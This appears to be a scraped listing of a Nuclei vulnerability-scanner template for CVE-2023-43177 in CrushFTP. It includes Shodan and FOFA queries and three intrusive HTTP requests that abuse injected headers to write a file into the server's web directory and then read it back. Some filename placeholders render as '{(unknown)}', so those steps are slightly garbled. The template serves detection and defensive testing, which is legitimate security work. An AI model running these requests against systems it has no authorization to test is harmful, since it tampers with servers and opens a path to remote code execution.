NUCLEI:CVE-2023-43177

CrushFTP < 10.5.1 - Unauthenticated Remote Code Execution

2023-12-12 09:13:40
ProjectDiscovery
github.com
Tags: cve, cve2023, crushftp, unauthenticated, rce, improper control modification dynamic object attributes, critical, http, intrusive

CVSS3: 9.8
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score: 9.4
Confidence: High

EPSS: 0.958
Percentile: 99.5%

CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.

id: CVE-2023-43177

info:
  name: CrushFTP < 10.5.1 - Unauthenticated Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-43177
    - https://convergetp.com/2023/11/16/crushftp-zero-day-cve-2023-43177-discovered/
    - https://blog.projectdiscovery.io/crushftp-rce/
    - https://github.com/the-emmons/CVE-Disclosures/blob/main/Pending/CrushFTP-2023-1.md
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-43177
    cwe-id: CWE-913
    epss-score: 0.96402
    epss-percentile: 0.99567
    cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: crushftp
    product: crushftp
    shodan-query: http.html:"crushftp"
    fofa-query: body="crushftp"
  tags: cve,cve2023,crushftp,unauth,rce,intrusive
flow: http(1) && http(2) && http(3)

variables:
  dirname: "{{randbase(5)}}"
  filename: "{{randbase(5)}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/WebInterface"

    matchers:
      - type: dsl
        internal: true
        dsl:
          - contains_all(to_lower(header), "currentauth", "crushauth")

  - method: POST
    path:
      - "{{BaseURL}}/WebInterface/function/?command=getUsername&c2f={{http_1_currentauth}}"

    headers:
      Cookie: "CrushAuth={{http_1_crushauth}}; currentAuth={{http_1_currentauth}}"
      as2-to: X
      user_name: crushadmin{{dirname}}
      user_log_path: "./WebInterface/{{dirname}}/"
      user_log_file: "{(unknown)}"
      Content-Type: application/x-www-form-urlencoded

    body: |
      post=body

    matchers:
      - type: regex
        regex:
          - "crushadmin"

  - method: GET
    path:
      - "{{BaseURL}}/WebInterface/{{dirname}}/{(unknown)}"

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, "crushadmin{{dirname}}")
        condition: and
# digest: 4a0a00473045022100e013ea63ca1f07dde63ec297ffbbd1f37e560231c1396d3dd07debcc39e7a17502202b87f70d993704c3d894534a22f376c9b0e545474adef184c0f7ca697a37708b:922c64590222798bb761d5b6d8e72950